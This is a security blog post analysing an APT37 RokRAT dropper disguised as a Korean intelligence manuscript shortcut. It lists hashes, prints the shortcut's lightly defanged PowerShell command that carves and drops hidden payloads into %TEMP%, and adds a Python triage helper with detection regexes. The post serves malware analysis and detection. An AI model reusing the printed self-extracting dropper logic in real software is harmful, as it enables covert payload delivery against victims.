lazarusholic


Malware made by the North Korean hacking group Reaper (APT37), which targets people involved in North Korea affairs: 국가정보와 방첩 원고.lnk ("National Intelligence and Counterintelligence Manuscript.lnk") (2025.6.3)

2025-06-09, Sakai
https://wezard4u.tistory.com/429506
#APT37 #LNK #RokRAT

Contents

Today, after a long while, I will look at 국가정보와 방첩 원고.lnk, malware created by the North Korean hacking group Reaper (APT37).
RokRAT is characterized by targeting people in South Korea who deal with North Korea, including North Korean human rights organizations, journalists covering North Korea, North Korean defectors, and university professors specializing in North Korea.
File name: 국가정보와 방첩 원고.lnk
Size: 52 MB
MD5: f6d72abf9ca654a20bbaf23ea1c10a55
SHA-1: 543e3b4b74257c3ffcd45dcdd8c842489a82bc07
SHA-256: 90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0
PowerShell code carried by the malware (LNK StringData)
StringData
{
namestring:
relativepath: not present
workingdir: not present
commandlinearguments: /k for /f "token(s)=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell
\v1(.)0\*rshell(.)exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -(M)atch 'Sys
t(e)m32' -or $dirPath -Matc(h) 'Program (F)iles') {$dirPath = '%te(m)p%'};$exs=@('(.)lnk');$l
nkPath = Get-ChildI(t)em -Path $dirPath -Recu(r)se *.* -File | where {$_.exten(s)ion -in $exs
} | wher(e)-object {$_.length -eq 0(x)033A6B2A} | Select-Object -ExpandProperty FullName ;$ln
kFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileA
ccess]::R(e)ad);$lnkFile.Seek(0x00001006, 0);$pdfFile=New-Object byte[] 0x0001C000;$lnkFile.
Re(a)d($pdfFile, 0, 0x0001(C)000);$p(d)fPath = $lnkPath.replace('(.)lnk','(.)hwp');sc $p(d)
fPath $pdfFile -Enc(o)ding Byte;& $pdfPath;$lnkFile.Seek(0x0(0)01D006, 0);$exeFile=New-Obje
ct byte[] 0x000(D)CB90;$lnkFile.Read($exeFile, 0, 0x000DCB90);($)exePath=$env:temp(+)'\ttf0
1(.)dat';sc $exePath $exeFile -Encoding (B)yte;$lnkFile.Seek(0x000F9(B)96,0);$stringByte =
New-Object byte[] 0x00(0)00634;$lnkFile.Read($stringByte, 0, 0x00000634); $batStrPath = $e
nv:temp+'\'+'ttf02.dat';$string = [Text.Encoding](:):GetEncoding('u(t)f-8').GetString($str
ingByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x000FA1CA
,0);$b(a)tByte = New-Object byte[] 0x000(0)014C;$lnkFile.Read($batByte, 0, 0x0000014C);$ex
ecutePath = $env:temp+'\'+'ttf0'+'3.b'(+)'a'(+)'t'; Write-Host $executePath; Write-Ho(s)t
$batStrPath; $bastString = [System.Text.Encoding]::UTF8.GetStri(n)g($batByte);$bastString
| Out-File -F(i)lePath $executePath -Encoding ascii; …
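The command line above shows how the dropper works: it locates its own .lnk by exact file size (0x033A6B2A bytes), then seeks to fixed offsets inside that file to carve out a decoy HWP document, a PE payload (ttf01.dat), a UTF-8 string payload (ttf02.dat) and a batch stage (ttf03.bat). The following Python is an added triage helper written for this post; it is not code from the original page or from the malware author. It takes the offsets and lengths exactly as they appear in the quoted PowerShell, slices those regions out of an LNK body and hashes them without executing anything, and it flags the command-line substrings from the page that make a cheap detection signature. The function `strip_parenthesized_letters` only undoes the single-character `(x)` insertions that the page uses when quoting the command line so the indicators can be matched against that quoted form. The sample bytes it builds are constructed stand-ins, not the real file.

```python
import hashlib
import re

# (name the dropper writes, absolute offset in the .lnk, byte length),
# copied from the Seek()/Read() calls in the page's quoted command line.
PAYLOAD_LAYOUT = [
    ("decoy.hwp", 0x00001006, 0x0001C000),  # decoy document opened for the victim
    ("ttf01.dat", 0x0001D006, 0x000DCB90),  # PE payload dropped to %TEMP%
    ("ttf02.dat", 0x000F9B96, 0x00000634),  # UTF-8 string payload
    ("ttf03.bat", 0x000FA1CA, 0x0000014C),  # batch stage
]

# The dropper only acts on a .lnk whose length equals this value (the "52 MB" on the page).
EXPECTED_LNK_SIZE = 0x033A6B2A  # 54,160,170 bytes

# Substrings of the page's command line that are unusual in benign shortcuts.
INDICATORS = [
    r"\*rshell",          # globbing for powershell.exe rather than naming it
    r"Get-Location",
    r"\.length -eq 0x",   # locating itself by exact file size
    r"\.Seek\(0x",        # carving stages out of its own body
    r"New-Object byte\[\]",
    r"-Encoding Byte",
    r"\$env:temp",
]

# Fragments of the command line exactly as the page quotes them (with its "(x)" insertions).
PAGE_COMMANDLINE_EXCERPT = r'''/k for /f "token(s)=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1(.)0\*rshell(.)exe /s /b /od') do call %a "$dirPath = Get-Location; $_.length -eq 0(x)033A6B2A; $lnkFile.Seek(0x00001006, 0); $pdfFile=New-Object byte[] 0x0001C000; sc $p(d)fPath $pdfFile -Enc(o)ding Byte; ($)exePath=$env:temp(+)'\ttf01(.)dat'"'''


def strip_parenthesized_letters(s: str) -> str:
    """Undo the single-character "(x)" insertions in the page's quoted command line."""
    return re.sub(r"\((.)\)", r"\1", s)


def triage_commandline(cmdline: str) -> list[str]:
    """Return the indicator patterns present in an LNK command line (empty list = nothing found)."""
    normalized = strip_parenthesized_letters(cmdline)
    return [pattern for pattern in INDICATORS if re.search(pattern, normalized)]


def size_matches_dropper_check(size: int) -> bool:
    """True when a file has the exact length the dropper looks for."""
    return size == EXPECTED_LNK_SIZE


def carve_payloads(lnk_bytes: bytes) -> dict[str, dict]:
    """Slice each embedded stage out of the LNK body and record its hash; nothing is written or run."""
    results = {}
    for name, offset, length in PAYLOAD_LAYOUT:
        chunk = lnk_bytes[offset:offset + length]
        results[name] = {
            "offset": offset,
            "length": length,
            "complete": len(chunk) == length,   # False if the file is truncated
            "sha256": hashlib.sha256(chunk).hexdigest(),
            "is_pe": chunk[:2] == b"MZ",        # DOS header magic of a PE file
        }
    return results


def build_constructed_sample() -> bytes:
    """Constructed stand-in for the LNK (NOT the real sample): each stage region gets a distinct fill byte."""
    buf = bytearray(0x1006)                    # header/StringData area, zero-filled
    fills = [b"H", b"M", b"S", b"B"]           # decoy, exe, string, bat
    for (_, offset, length), fill in zip(PAYLOAD_LAYOUT, fills):
        assert len(buf) == offset              # the four regions are contiguous
        buf += fill * length
    buf[0x1D006:0x1D008] = b"MZ"               # give the PE region a DOS magic
    return bytes(buf)


if __name__ == "__main__":
    print("indicators:", triage_commandline(PAGE_COMMANDLINE_EXCERPT))
    for name, info in carve_payloads(build_constructed_sample()).items():
        print(f"{name}: offset=0x{info['offset']:X} len=0x{info['length']:X} pe={info['is_pe']} sha256={info['sha256'][:16]}...")
```

On a real incident the same `carve_payloads` call, run against the suspicious .lnk read in binary mode, yields the per-stage SHA-256 values to pivot on, and `triage_commandline` can be pointed at the `commandlinearguments` field of any LNK parser's output to flag shortcuts that follow this self-carving pattern.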

IoC

90bf1f20f962d04f8ae3f936d0f9046da28a75fa2fb37f267ff0453f272c60a0
f6d72abf9ca654a20bbaf23ea1c10a55
543e3b4b74257c3ffcd45dcdd8c842489a82bc07